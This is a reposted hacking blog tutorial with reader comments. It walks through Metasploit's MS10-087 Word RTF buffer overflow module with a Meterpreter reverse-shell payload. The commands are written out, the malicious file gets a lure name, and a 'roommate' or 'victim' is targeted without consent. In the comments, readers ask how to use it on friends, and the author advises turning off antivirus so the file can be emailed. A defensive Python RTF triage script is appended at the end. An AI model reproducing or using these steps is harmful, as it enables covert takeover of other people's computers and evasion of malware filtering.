Hack Like a Pro: Exploit MS Word to Embed a Listener on Your Roommate's Computer

Posted by occupytheweb (OTW), 5 months ago
Null Byte http://null-byte.wonderhowto.com/how-to/hack-like-pro-exploit-ms-word-embed-listener-your-roommates-computer-0140868/ [6/1/2013 12:04:28 AM]

In my last hack blog on crashing your roommate's Win7 system, we started looking at client-side attacks. As promised, we will be looking at some more client-side attacks.

As web servers and OSs have become hardened and now live behind significant perimeter defenses, hackers have migrated to the easiest route to the pot of gold: the often unpatched, unhardened client-side system, with little in the way of defenses and a plethora of vulnerable software, including the ubiquitous Microsoft Office products.

This hack will work on Word 2007 or Word 2010. It exploits a buffer overflow in Word to allow us to plant a listener on our target system.

I'm assuming that you have the victim's IP address and have verified that Microsoft Office is running (a good assumption, but it's better to verify).

Step 1: Start Metasploit

So, let's fire up Metasploit and find the exploit/windows/fileformat/ms10_087_rtf_pfragments_bof.

Now, set Metasploit to use this exploit by typing:

    msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

Step 2: Set a Payload

Then we need to set a payload. In this case, we wish to use Metasploit's powerful Meterpreter to establish a listener on the victim's system.

    msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_tcp

Step 3: Show Options

Now, let's look at our options. As you know from my previous Metasploit blogs, every exploit has options, some mandatory and some not. Let's take a look at the options for this exploit by typing:

    msf > show options

We can see from the screenshot above that Metasploit has a number of options for this exploit. First, we are creating a .rtf file, and Metasploit gives it a default name of FILENAME.

Step 4: Change FILENAME

Let's change that name to something more inviting to our victim, such as newyearsgreeting.rtf:

    msf > set FILENAME newyearsgreeting.rtf

Step 5: Set Your Local Host

Next we need to set the LHOST, or the local host. This will be the system we will be listening from (usually our local system), but it could be any system you want to listen from. We simply need to set the LHOST to the IP address of our listening system, in this case 192.168.1.100.

    msf > set LHOST 192.168.1.100

Step 6: Last Check of Options

Before we exploit the victim's system, let's check to make sure all our options are set properly.

    msf > show options

Note in the screenshot that the FILENAME is now set to newyearsgreeting.rtf and the LHOST is 192.168.1.100.

Step 7: Exploit

Now, we are ready to exploit. Simply type:

    msf > exploit

You can see that Metasploit has generated a file called newyearsgreeting.rtf and placed it at /root/.msf4/local/newyearsgreeting.rtf.

Step 8: Send the File to the Victim

Now we need to send this file to the victim through email or another method. Once the victim opens the file, the Word application will hang or crash, leaving us with an active Meterpreter session on the victim's system. With an active Meterpreter session on the victim's system, we have nearly total control of, or "own," their system.

PETTER RONESS MADSHUS, 3 months ago:
Say I send the listener to a friend just for laughs, what do I do when he opens it? Do I have to use commands to control his computer? If you have tutorials on this it would be much appreciated ^^

HARRISON DOCHOFF, 3 months ago:
Question: instead of using Metasploit's Meterpreter as the payload, could you use a DarkComet RAT .exe? Also, which is better and has more options? I only have experience with RATs. If anyone can answer this it would help me a lot, thanks.

RONALD ALLAN, 2 months ago:
MSF is far better than DarkComet. It has more post-exploitation options than DarkComet. And as a personal preference, I prefer the command line to the GUI. I even prefer MSFCONSOLE to MSFWEB or ARMITAGE. It's a lot faster to navigate once you master the keyboard commands.

JERET CHRISTOPHER, 2 months ago:
Hi, how do I get to Meterpreter? What do I do once the file is opened?

RIZARD GRIGORE, 2 weeks ago:
I can't send it via e-mail, it detects a virus and won't let me send it.

OCCUPYTHEWEB (OTW), 2 weeks ago:
Rizard: Turn off your antivirus. OTW
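From the defender's side, a file like the one generated in Step 7 can be triaged at the mail gateway by content rather than by its inviting name. The following is an added example, not part of the original post or of Metasploit: a Python heuristic that recognizes RTF by its leading bytes and flags the pFragments shape property named in the module. The names triage_rtf and SV_LIMIT, the threshold value and both sample documents are assumptions constructed for illustration.

```python
import re

# RTF shape properties are stored as {\sp{\sn <name>}{\sv <value>}}.
# Capture the name/value pair so the pFragments property can be inspected.
_PROP = re.compile(rb"\{\s*\\sn\s+([^{}]*?)\s*\}\s*\{\s*\\sv\s+([^{}]*)\}")

SV_LIMIT = 512  # assumed triage threshold in bytes; tune it on your own mail corpus


def triage_rtf(data: bytes, name: str = "") -> dict:
    """Classify an attachment by its content, never by its file name."""
    verdict = {"name": name, "is_rtf": False, "hits": [], "action": "allow"}
    # Match the short "{\rt" prefix (the same magic oletools checks), so an
    # RTF body renamed to .doc is still recognized.
    if not data.lstrip()[:4].lower().startswith(b"{\\rt"):
        return verdict
    verdict["is_rtf"] = True
    for m in _PROP.finditer(data):
        # Normalize case and whitespace so trivial variations still match.
        prop = re.sub(rb"\s+", b"", m.group(1)).lower()
        if prop == b"pfragments":
            verdict["hits"].append(len(m.group(2)))
    if verdict["hits"]:
        # Any pFragments property is unusual in mail; a long value is worse.
        oversized = max(verdict["hits"]) > SV_LIMIT
        verdict["action"] = "quarantine" if oversized else "review"
    return verdict


# Constructed samples: inert filler, not taken from any real document.
BENIGN = b"{\\rtf1\\ansi Happy new year!}"
SUSPECT = (b"{\\rtf1{\\shp{\\*\\shpinst{\\sp{\\sn pFragments}{\\sv "
           + b"0" * 600 + b"}}}}}")

if __name__ == "__main__":
    for label, blob in (("greeting.rtf", BENIGN), ("newyearsgreeting.doc", SUSPECT)):
        print(triage_rtf(blob, label))
```

The regular expression only handles the plain, un-nested form of the property group, so treat an "allow" result as "nothing found by this check" and keep antivirus scanning and Office patching (the module name refers to bulletin MS10-087) in place alongside it.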